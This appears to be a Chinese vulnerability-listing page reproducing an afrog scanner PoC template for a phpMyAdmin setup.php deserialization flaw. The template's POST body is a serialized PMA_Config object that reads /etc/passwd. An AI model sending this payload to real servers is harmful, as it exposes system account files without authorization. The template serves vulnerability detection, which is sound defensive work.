phpmyadmin-setup-deserialization: Phpmyadmin Setup Deserialization

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

Phpmyadmin Setup Deserialization Vulnerability

PoC代码[已公开]

id: phpmyadmin-setup-deserialization

info:
  name: Phpmyadmin Setup Deserialization
  author: p0wd3r
  severity: high
  description: |-
    Phpmyadmin Setup Deserialization Vulnerability
  tags: phpmyadmin,deserialization
  created: 2023/10/13

rules:
  r0:
    request:
      method: POST
      path: /scripts/setup.php
      body: action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/phpmyadmin-setup-deserialization.yaml